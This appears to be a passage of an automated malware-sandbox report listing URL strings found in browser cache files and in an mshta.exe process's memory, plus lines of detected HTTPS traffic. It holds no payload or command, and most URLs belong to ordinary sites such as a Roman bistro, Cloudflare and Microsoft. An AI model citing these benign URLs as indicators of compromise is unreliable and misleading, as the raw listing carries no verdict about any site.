    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/comments/feed/
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/contatti/
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/cookies-policy-privacy/
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/curiosita/
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/feed/
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/menu-2/
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/vineria-e-bistrot-al-centro-di-roma-2/
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/vineria-e-bistrot-al-centro-di-roma-2/#breadcrumb
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-admin/admin-ajax.php
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-admin/admin-ajax.php?lang=it
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/plugins/cookie-law-info/legacy/public/css/cookie-law-info-gd
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/plugins/cookie-law-info/legacy/public/css/cookie-law-info-pu
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/plugins/cookie-law-info/legacy/public/js/cookie-law-info-pub
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/plugins/instagram-feed/css/sbi-styles.min.css?ver=6.6.1
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/plugins/sitepress-multilingual-cms/res/flags/en.png
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/plugins/sitepress-multilingual-cms/res/flags/it.png
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/themes/enfold/
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/audio-p
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/blog/bl
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/buttonr
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/buttons
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/catalog
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/comment
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/contact
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/content
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/countdo
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/gallery
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/google_
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/grid_ro
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/heading
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/headlin
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/hr/hr.c
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/icon/ic
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/iconbox
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/icongri
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/iconlis
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/image/i
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/image_h
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/magazin
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/masonry
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/menu/me
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/notific
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/numbers
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/portfol
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/postsli
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/progres
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/promobo
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/search/
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/slidesh
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/social_
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/tab_sec
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/table/t
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/tabs/ta
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/team/te
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/testimo
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/timelin
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/toggles
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/video/v
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-template-builder/a
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/themes/enfold/config-wpml/wpml-mod.css?ver=4.5
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/themes/enfold/config-wpml/wpml-mod.js?ver=4.5
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/themes/enfold/css/avia-snippet-lightbox.css?ver=4.5
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/themes/enfold/css/avia-snippet-site-preloader.css?ver=6.0.9
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/themes/enfold/css/avia-snippet-widget.css?ver=4.5
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/themes/enfold/css/base.css?ver=4.5
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/themes/enfold/css/custom.css?ver=4.5
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/themes/enfold/css/grid.css?ver=4.5
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/themes/enfold/css/layout.css?ver=4.5
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/themes/enfold/css/shortcodes.css?ver=4.5
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/themes/enfold/framework/
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/themes/enfold/framework/js/conditional_load/avia_google_maps
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/themes/enfold/js/avia-compat.js?ver=4.5
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/themes/enfold/js/avia-snippet-lightbox.js?ver=4.5
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/themes/enfold/js/avia-snippet-sticky-header.js?ver=4.5
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/themes/enfold/js/avia-snippet-widget.js?ver=4.5
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/themes/enfold/js/avia.js?ver=4.5
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/themes/enfold/js/aviapopup/jquery.magnific-popup.min.js?ver=
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/themes/enfold/js/aviapopup/magnific-popup.css?ver=4.5
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/themes/enfold/js/html5shiv.js
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/themes/enfold/js/shortcodes.js?ver=4.5
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/uploads/2019/05/Cipasso_simbolo3.png
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/uploads/2019/05/cropped-Cipasso_Simbolo-180x180.png
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/uploads/2019/05/cropped-Cipasso_Simbolo-192x192.png
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/uploads/2019/05/cropped-Cipasso_Simbolo-270x270.png
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/uploads/2019/05/cropped-Cipasso_Simbolo-32x32.png
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/uploads/2019/06/1.png
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/uploads/2019/06/2.png
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/uploads/2019/06/3.png
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/uploads/2019/06/sfondo_cerchi.png)
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/uploads/2019/09/MG_4783-67-copia-2.jpg);background-attachmen
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/uploads/2021/06/CiPASSO-Bistrot-Roma-userci.png
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/uploads/2021/06/CiPASSO-Home-1030x506.jpg
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/uploads/2021/06/CiPASSO-Home-1500x630.jpg
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/uploads/2022/05/49925.jpg
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/uploads/2022/09/CIPASSO_logo_600.png
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/uploads/2022/09/CIPASSO_logo_600_nopoff_-300x143.png
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/uploads/2024/08/Dettaglio-della-sala-interna-495x400.jpg
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/uploads/2024/08/Dettaglio-della-sala-interna-845x684.jpg
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/uploads/2024/08/Schermata-2024-08-29-alle-09.19.49-845x576.p
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/uploads/2024/08/Schermata-2024-08-29-alle-09.22.19-845x646.p
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/uploads/2024/08/Schermata-2024-08-29-alle-09.25.53-845x675.p
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/uploads/2024/08/Servizio-di-sala-495x400.jpg
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/uploads/2024/08/Servizio-di-sala-845x684.jpg
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/uploads/2024/08/Vini-italiani-eccellenti-495x400.jpg
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/uploads/2024/08/Vini-italiani-eccellenti-845x684.jpg
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-content/uploads/dynamic_avia/enfold.css?ver=6335ddf9ba942
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-includes/js/jquery/jquery.min.js?ver=3.6.0
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-includes/wlwmanifest.xml
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-json/
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.cipassoitalia.it%2F
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.cipassoitalia.it%2F&#038
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/wp-json/wp/v2/pages/838
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/xmlrpc.php
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/xmlrpc.php?rsd
    Source: mshta.exe, 0000000C.00000002.2419552191.000001A8F9187000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2411657408.000001A0F65F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
    Source: mshta.exe, 0000000C.00000002.2419552191.000001A8F9187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing...
    Source: mshta.exe, 0000000C.00000002.2411657408.000001A0F65CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landingnagement/phishing-attack/
    Source: chromecache_597.1.drString found in binary or memory: https://www.cloudflare.com/favicon.ico
    Source: mshta.exe, 0000000C.00000002.2411657408.000001A0F65F4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2359318810.000001A8FD90D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
    Source: mshta.exe, 0000000C.00000002.2411657408.000001A0F65F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/?
    Source: mshta.exe, 0000000C.00000002.2419552191.000001A8F9187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/DB
    Source: mshta.exe, 0000000C.00000002.2411657408.000001A0F65F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/N
    Source: mshta.exe, 0000000C.00000002.2411657408.000001A0F65F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/T
    Source: mshta.exe, 0000000C.00000002.2411657408.000001A0F65F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/dy
    Source: mshta.exe, 0000000C.00000002.2411657408.000001A0F65F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/~
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://www.deezer.com/
    Source: chromecache_396.1.dr, chromecache_432.1.drString found in binary or memory: https://www.google-analytics.com/analytics.js
    Source: chromecache_605.1.dr, chromecache_499.1.drString found in binary or memory: https://www.google-analytics.com/debug/bootstrap?id=
    Source: chromecache_605.1.dr, chromecache_499.1.drString found in binary or memory: https://www.google-analytics.com/gtm/js?id=
    Source: chromecache_605.1.dr, chromecache_499.1.drString found in binary or memory: https://www.google.%/ads/ga-audiences
    Source: chromecache_605.1.dr, chromecache_499.1.drString found in binary or memory: https://www.google.com/ads/ga-audiences
    Source: content_new.js.21.drString found in binary or memory: https://www.google.com/chrome
    Source: chromecache_426.1.drString found in binary or memory: https://www.googleapis.com/auth/plus.me
    Source: chromecache_426.1.drString found in binary or memory: https://www.googleapis.com/auth/plus.people.recommended
    Source: chromecache_605.1.dr, chromecache_499.1.drString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://www.iheart.com/podcast/
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://www.instagram.com
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://www.last.fm/
    Source: chromecache_576.1.dr, chromecache_477.1.drString found in binary or memory: https://www.magictoolbox.com/license/
    Source: chromecache_576.1.dr, chromecache_477.1.drString found in binary or memory: https://www.magictoolbox.com/magiczoomplus/
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://www.messenger.com
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&game
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&item
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&item=fl
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&playInS
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://www.office.com
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://www.officeplus.cn/?sid=shoreline&endpoint=OPPC&source=OPCNshoreline
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=1
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=2
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=1
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=2
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://www.tiktok.com/
    Source: chromecache_644.1.drString found in binary or memory: https://www.tripadvisor.it/Restaurant_Review-g187791-d14121704-Reviews-CiPASSO-Rome_Lazio.html
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://www.youtube.com
    Source: chromecache_535.1.dr, chromecache_381.1.drString found in binary or memory: https://www.youtube.com/iframe_api
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://y.music.163.com/m/
    Source: chromecache_634.1.dr, chromecache_651.1.drString found in binary or memory: https://yastatic.net/s3/gdpr/v3/gdpr
    Source: chromecache_634.1.dr, chromecache_651.1.drString found in binary or memory: https://yastatic.net/s3/taxi-front/yango-gdpr-popup/
    Source: chromecache_634.1.dr, chromecache_651.1.drString found in binary or memory: https://ymetrica1.com/watch/3/1
    Source: chromecache_644.1.drString found in binary or memory: https://yoast.com/wordpress/plugins/seo/
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
    Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
    Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
    Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
    Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
    Source: unknownNetwork traffic detected: HTTP traffic on port 50085 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
    Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
    Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50107 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
    Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
    Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
    Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
    Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50108 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
    Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
    Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
    Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
